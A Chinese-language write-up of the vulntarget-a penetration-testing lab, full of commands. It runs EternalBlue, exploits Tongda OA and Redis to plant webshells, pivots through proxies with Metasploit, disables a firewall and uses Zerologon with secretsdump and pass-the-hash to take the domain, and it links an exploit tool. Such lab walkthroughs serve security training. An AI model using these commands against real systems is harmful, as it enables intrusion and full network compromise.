渗透靶场——vulntarget-a(完整版)
前言
上一篇在代理那块出了点问题,所以今天又重新写了一下这个靶场的完整过程
部署环境
此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。
只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。
靶机下载地址:
信息收集
扫描主机
扫描同一网段中的存活主机
发现一个存活主机(其他的是我自己其他机器)192.168.1.9
扫描端口
扫描一下存活靶机的ip地址
nmap -A -p- 192.168.1.9
一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,445端口存在着永恒之蓝漏洞,我们进行尝试看看能否成功
内网主机渗透
在kali中启动msfconsole
直接寻找永恒之蓝漏洞编号
search ms17-010
使用模块,并查看配置参数
use exploit/windows/smb/ms17_010_eternalblue
show options
设置攻击机和靶机的ip地址
设置后直接开始run或者exploit
发现确实是存在永恒之蓝漏洞,而且攻进去后发现是最高权限,然后收集一下里面的信息
发现有些乱码,直接在设置一下
chcp 65001(65001 UTF-8代码页)
ipconfig
发现确实好多了(本人英语部不咋地,所以,,,,,,你懂得)
发现有两个网段,一个是192.168.1的网段,另一个就是10.0.20段的
然后退出不用进去shell看一下
发现在这里已经有了用户名密码
先破解一下win7的看一下
用户名:win7 密码:admin
别的其实都登录不上,那再试试远程远程登录界面可不可以
发现已经是成功登录了
那这块就先结束一下,待会这块的内容还会继续去利用
Web渗透
直接访问http://192.168.1.9/
程序为通达OA(后面看到网站标题上也有),使用工具验证下是否存在漏洞
工具链接如下:
链接:https://pan.baidu.com/s/1FJ8CeqdXx_nN_09JvYvZdg?pwd=ui1t
提取码:ui1t
利用成功,用蚁剑连接
右键进入虚拟终端
在终端输入命令发现也是最高权限
横向渗透
1、进程迁移
获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到。自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移
run post/windows/manage/migrate
从1132的spoolsv.exe迁移到了3164进程,来看看3164是什么进程
ps
notepad,迁移到了记事本中
2、添加路由
添加路由为了向10.0.20.0网段进行渗透,
首先在反弹shell界面退出,看下WIN7虚拟机的session
然后执行自动创建路由
use post/multi/manage/autoroute
set session 1
run
这时候就已经添加上路由了
3、发现存活主机
use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.1-254
run
发现了另一台存活主机10.0.20.99
4、扫描目标端口
use auxiliary/scanner/portscan/tcp
set ports 22-500,8000-10000
set rhosts 10.0.20.99
threads 50
run
该说不说昂,这个速度属实太慢,直接换一种方式扫描
5、开启代理
use auxiliary/server/socks_proxy
run
6、端口扫描
首先先要需要修改/etc/proxychain4.conf配置文件
sudo proxychains nmap -sT -Pn 10.0.20.99 -p22,23,80,139,445,1433,3306,3389,6379,8080
扫描到80、6379两个端口开放
Web渗透
访问80端口
proxychains curl http://10.0.20.99
发现没有什么东西,就一个hello world
对80端口做目录扫描
proxychains dirsearch -u “http://10.0.20.99” --proxy=socks5://127.0.0.1:1080 -t 5
发现phpinfo.php
访问看看
proxychains curl http://10.0.20.99/phpinfo.php
其实也可以直接把所有代码考出来,然后html制作一下也可以,所以到这步已经找到程序目录
Redis未授权访问
主要是因为配置不当,导致未授权访问漏洞。进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。
配置不当一般主要是两个原理:
1.配置登录策略导致任意机器都可以登录 redis。
2.未设置密码或者设置弱口令。
那首先我们先来在kail机安装一下redis-cli
1、获取redis稳定版并解压
cd /tmp
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
2、编译
make
3、全局使用redis-cli
cp src/redis-cli /usr/bin/
到这里已经全部安装完成
再来访问6379端口,6379是redis的服务端口,Redis 是一个高性能的key-value数据库
proxychains redis-cli -h 10.0.20.99
访问成功,不需要密码
Redis写入webshell
1、切换目录
config set dir “C:/phpStudy/PHPTutorial/WWW/”
2、写入一句话木马
config set dbfilename tx.php
set 1 “”
save
用蚁剑连接,需要挂代理,在这里有一个坑,正确的做法应该是在kali里下载蚁剑进行代理,但是我竟然用了宿主机的,,,,多亏大佬告诉,要不就gg了。
启动后出现以下界面可以正常操作即可
右键打开终端
打开虚拟终端,查看系统信息
ipconfig
发现另一个网段,查看权限
whoami
会发现是system权限,
上传MSF后门
1、生成正向shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe >shell.exe
2、使用蚁剑上传shell.exe到10.0.20.99,并执行
3。配置监听器
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 3333
set RHOST 10.0.20.99
run
无法连接,估计有防火墙,
关闭防火墙
netsh firewall set opmode mode=disable
4、重新执行监听器
Ctrl+C
run
在这里有一个错误就是,一定要在设置session那个界面去做这一步,因为只有在哪里我们设置了代理,其他位置是没办法回弹的。
收集主机信息
sysinfo
收集同网段主机
arp
在这里应该是能扫出10.0.10.110网段,因为我电脑性能原因无法开始机器(又该换电脑了)所以就直接把大佬的截图拿来了
同网段主机只有1个,收集IP信息
ipconfig /all
有域存在,查看域控计算机名
net group “domain controllers” /domain
查看域管理员
net group “enterprise admins” /domain
域提权
1、添加路由
run post/multi/manage/autoroute
2、下载CVE-2020-1472EXP
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 -m pip install -r requirements.txt
python3 -m pip install .
https://github.com/dirkjanm/CVE-2020-1472.git
3、执行EXP
cd CVE-2020-1472
python3 -m pip install -r requirements.txt
proxychains python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110
4、绑定域名
sudo vi /etc/hosts
5、获取域管理员hash
proxychains python3 secretsdump.py vulntarget.com/WIN2019$@10.0.10.110 -no-pass
6、拿到管理员hash,执行提权exp
proxychains python3 smbexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
Administrator@10.0.10.110
拿到域管理员权限,游戏结束,也终于结束了,都快gg了~
